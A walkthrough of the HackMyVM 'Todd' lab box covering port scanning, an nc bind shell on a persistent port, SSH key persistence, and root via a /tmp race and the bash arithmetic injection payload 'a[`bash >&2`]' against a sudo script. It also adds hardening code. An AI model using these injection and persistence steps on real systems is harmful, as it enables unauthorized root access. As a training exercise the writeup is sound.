HackMyVM-Todd-Walkthrough
城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.133 08:00:27:17:89:31 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f0:6f:4b VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.061 seconds (124.21 hosts/sec). 4 responded
export ip=192.168.60.133
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.133:22
Open 192.168.60.133:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 17:45 CST
Initiating ARP Ping Scan at 17:45
Scanning 192.168.60.133 [1 port]
Completed ARP Ping Scan at 17:45, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:45
Completed Parallel DNS resolution of 1 host. at 17:45, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:45
Scanning 192.168.60.133 [2 ports]
Discovered open port 22/tcp on 192.168.60.133
Discovered open port 80/tcp on 192.168.60.133
Completed SYN Stealth Scan at 17:45, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.133
Host is up, received arp-response (0.00068s latency).
Scanned at 2025-04-01 17:45:31 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:17:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Directory Enumeration

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.133
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 2060]
/tools (Status: 301) [Size: 316] [--> http://192.168.60.133/tools/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

The /tools directory contains the penetration-testing tools we commonly use.


From this we can infer that a backdoor very likely exists.

I did some fuzzing, though, guessing there might be an LFI, but it led nowhere.

Getting a User Shell

But when you scan the ports again, you will find that many unexplained ports have opened up.

❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.133:22
Open 192.168.60.133:80
Open 192.168.60.133:5045
Open 192.168.60.133:5059
Open 192.168.60.133:6440
Open 192.168.60.133:6610
Open 192.168.60.133:7066
Open 192.168.60.133:16909
Open 192.168.60.133:19253
Open 192.168.60.133:25400
Open 192.168.60.133:27765
Open 192.168.60.133:31556
Open 192.168.60.133:31671
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 21:06 CST
Initiating ARP Ping Scan at 21:06
Scanning 192.168.60.133 [1 port]
Completed ARP Ping Scan at 21:06, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:06
Completed Parallel DNS resolution of 1 host. at 21:06, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:06
Scanning 192.168.60.133 [13 ports]
Discovered open port 22/tcp on 192.168.60.133
Discovered open port 80/tcp on 192.168.60.133
Completed SYN Stealth Scan at 21:06, 0.04s elapsed (13 total ports)
Nmap scan report for 192.168.60.133
Host is up, received arp-response (0.00054s latency).
Scanned at 2025-04-01 21:06:08 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
5045/tcp closed osp reset ttl 64
5059/tcp closed sds reset ttl 64
6440/tcp closed heliosd reset ttl 64
6610/tcp closed unknown reset ttl 64
7066/tcp closed unknown reset ttl 64
16909/tcp closed unknown reset ttl 64
19253/tcp closed unknown reset ttl 64
25400/tcp closed unknown reset ttl 64
27765/tcp closed unknown reset ttl 64
31556/tcp closed unknown reset ttl 64
31671/tcp closed unknown reset ttl 64
MAC Address: 08:00:27:17:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Raw packets sent: 14 (600B) | Rcvd: 14 (556B)

I scanned with nmap and saved the output to files.

Then use comm to compare the two files and keep only the lines they have in common.

❯ nmap -p- $ip -oN a.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 21:07 CST
Nmap scan report for 192.168.60.133
Host is up (0.0021s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5924/tcp open unknown
5929/tcp open unknown
7066/tcp open unknown
15930/tcp open unknown
16548/tcp open unknown
22650/tcp open unknown
25595/tcp open unknown
27503/tcp open unknown
30116/tcp open unknown
31633/tcp open unknown
32320/tcp open unknown
MAC Address: 08:00:27:17:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
❯ nmap -p- $ip -oN b.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 21:09 CST
Nmap scan report for 192.168.60.133
Host is up (0.00064s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3469/tcp open pluribus
7066/tcp open unknown
7273/tcp open openmanage
7820/tcp open unknown
11315/tcp open unknown
19638/tcp open unknown
21474/tcp open unknown
25764/tcp open unknown
28602/tcp open unknown
30971/tcp open unknown
MAC Address: 08:00:27:17:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.85 seconds
comm -12 a.txt b.txt
Nmap scan report for 192.168.60.133
comm: file 1 is not in sorted order
comm: file 2 is not in sorted order
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
7066/tcp open unknown
MAC Address: 08:00:27:17:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

comm: input is not in sorted order

This shows that port 7066 is the one that stays open the whole time.
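The comm run above only worked by accident: comm expects both inputs sorted, which is what the "not in sorted order" warnings mean. As an added example that is not part of the original post, this script extracts the open ports from two `nmap -oN` reports (constructed samples modelled on the two scans above) and intersects them properly, so the decoy listeners that change between scans drop out and the persistent port remains.

```shell
# Added example, not from the original post. Both report files below are
# constructed samples in the shape of `nmap -oN` output.
WORK=$(mktemp -d)

cat > "$WORK/a.txt" <<'EOF'
Nmap scan report for 192.168.60.133
Host is up (0.0021s latency).
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
5924/tcp  open  unknown
7066/tcp  open  unknown
32320/tcp open  unknown
EOF

cat > "$WORK/b.txt" <<'EOF'
Nmap scan report for 192.168.60.133
Host is up (0.00064s latency).
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3469/tcp  open  pluribus
7066/tcp  open  unknown
7820/tcp  open  unknown
EOF

# Print "port/proto" for every open port in one -oN report, sorted in the
# byte order comm(1) requires (LC_ALL=C keeps sort and comm in agreement).
open_ports() {
    grep -E '^[0-9]+/(tcp|udp) +open' "$1" | awk '{ print $1 }' | LC_ALL=C sort
}

# Print the ports that are open in both reports, ascending by port number.
# Only a listener present in every scan is a real, persistent service.
stable_ports() {
    open_ports "$1" > "$WORK/.ports1"
    open_ports "$2" > "$WORK/.ports2"
    LC_ALL=C comm -12 "$WORK/.ports1" "$WORK/.ports2" | sort -n
}

stable_ports "$WORK/a.txt" "$WORK/b.txt"
```

With more than two scans, pipe each report through open_ports and intersect pairwise; anything that survives every round is the port worth looking at.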

Connect to it with nc.

The nc session drops at irregular intervals, but it is enough to see that what we get is an ordinary user's privileges.

❯ nc $ip 7066
id
uid=1000(todd) gid=1000(todd) groups=1000(todd)
pwd
/root
ls
cd ~

So before it closes again, I quickly write my public key into authorized_keys.

❯ nc $ip 7066
id
uid=1000(todd) gid=1000(todd) groups=1000(todd)
cd ~
mkdir -p .ssh
cd .ssh
echo "ssh-rsa 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 Pepster@primary">authorized_keys
chmod 600 authorized_keys
-----------------------------------------------------
❯ ssh todd@$ip -i ../.ssh/id_rsa
Linux todd 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ bash
todd@todd:~$ cat user.txt
Todd{eb93009a2719640de486c4f68daf62ec}

But you will notice that after a while the SSH session is cut off as well.

After reconnecting, I found several script files in the /opt directory.

todd@todd:/opt$ ls -al
total 40
drwxr-xr-x 2 root root 4096 Mar 22 10:40 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
-rwx------ 1 root root 138 Mar 22 08:00 create_nc2.sh
-rwx---r-- 1 root root 141 Mar 22 07:42 create_nc.sh
-rwx------ 1 root root 16608 Mar 22 07:21 fake_ssh
-rwx------ 1 root root 17 Mar 22 07:07 kill_todd.sh
todd@todd:/opt$ cat create_nc.sh
#!/bin/bash

create_ssh(){
    sudo -u todd nc -e /opt/fake_ssh -lp $1
}

for i in $(seq 10)
do
    a=$((RANDOM))
    sleep 0.2
    create_ssh $a &
done

The user also has sudo rights.

todd@todd:~$ sudo -l
Matching Defaults entries for todd on todd:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User todd may run the following commands on todd:
(ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh
(ALL : ALL) NOPASSWD: /usr/bin/rm
(ALL : ALL) NOPASSWD: /usr/sbin/reboot

Try deleting that script (kill_todd.sh) directly.

todd@todd:~$ sudo rm /opt/kill_todd.sh

Root Privilege Escalation

Also take a look at guess_and_check.sh.

todd@todd:/tmp$ cat /srv/guess_and_check.sh
#!/bin/bash

cat << EOF
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
EOF


# check this script used by human
a=$((RANDOM%1000))
echo "Please Input [$a]"

echo "[+] Check this script used by human."
echo "[+] Please Input Correct Number:"
read -p ">>>" input_number

[[ $input_number -ne "$a" ]] && exit 1

sleep 0.2
true_file="/tmp/$((RANDOM%1000))"
sleep 1
false_file="/tmp/$((RANDOM%1000))"

[[ -f "$true_file" ]] && [[ ! -f "$false_file" ]] && cat /root/.cred || exit 2

First it asks for the correct random number, which it has already printed for you.

Then it assigns two variables, each a path in /tmp named with a random number, and reads /root/.cred only if $true_file exists and $false_file does not.

Note also that it sleeps before each variable is assigned.

So we can race it: create a large number of random-numbered files in /tmp.

With some luck there will be a run in which $true_file exists and $false_file does not.

todd@todd:/tmp$ for i in {1..1001};do touch /tmp/$((RANDOM%1000)); sleep 0.1; done
todd@todd:/tmp$ sudo /bin/bash /srv/guess_and_check.sh
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
Please Input [138]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>138
fake password
todd@todd:/tmp$ su root
Password:
root@todd:/tmp# cd /root/
root@todd:~# ls
root.txt
root@todd:~# cat root.txt
Todd{389c9909b8d6a701217a45104de7aa21}

That approach is pure luck, but there is also a command-injection point.

During the comparison we can make use of bash arrays: inside [[ ... -ne ... ]] the operands are evaluated as arithmetic, and an array subscript in that expression can run a command.

We redirect its output to standard error, because standard output would otherwise be captured by the command substitution.

todd@todd:/tmp$ sudo /bin/bash /srv/guess_and_check.sh
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, HackMyVM
Please Input [537]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>a[`bash >&2`]
root@todd:/tmp#
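Both escalation paths come down to the checks in guess_and_check.sh trusting what they should not. As an added example that is not part of the original post or the box's own script, this is a hardened replacement for the number check: the original's `[[ $input_number -ne "$a" ]]` lets bash evaluate the input as arithmetic, so validating it as plain digits first closes the injection.

```shell
#!/bin/bash
# Added example, not from the original post: a hardened version of the
# number check in /srv/guess_and_check.sh. The original compares with
#   [[ $input_number -ne "$a" ]] && exit 1
# and [[ ... ]] evaluates both operands of -ne as bash arithmetic, so input
# such as a[$(cmd)] runs cmd with the script's privileges (root under sudo).

# check_number EXPECTED INPUT: return 0 if INPUT is exactly EXPECTED as a
# decimal number, 1 otherwise. Non-digit input never reaches a comparison.
check_number() {
    expected=$1
    input=$2
    # Reject empty input and anything containing a non-digit character:
    # signs, spaces, array subscripts, command substitutions.
    case $input in
        '' | *[!0-9]*) return 1 ;;
    esac
    # The [ builtin's -eq parses both sides as plain base-10 integers and
    # performs no expression evaluation, unlike [[ -ne ]].
    [ "$input" -eq "$expected" ]
}

# The original prompt flow, now using the safe check. The expected value
# is still printed to the user, exactly as the challenge script does.
prompt_and_check() {
    a=$((RANDOM % 1000))
    echo "Please Input [$a]"
    echo "[+] Please Input Correct Number:"
    printf '>>>'
    read -r input_number
    check_number "$a" "$input_number"
}
```

The file test that follows in the original script has a similar weakness: it bases a privileged decision on predictable names in world-writable /tmp with a sleep in between, which is exactly the window the touch loop above races; a private directory from mktemp -d would remove it.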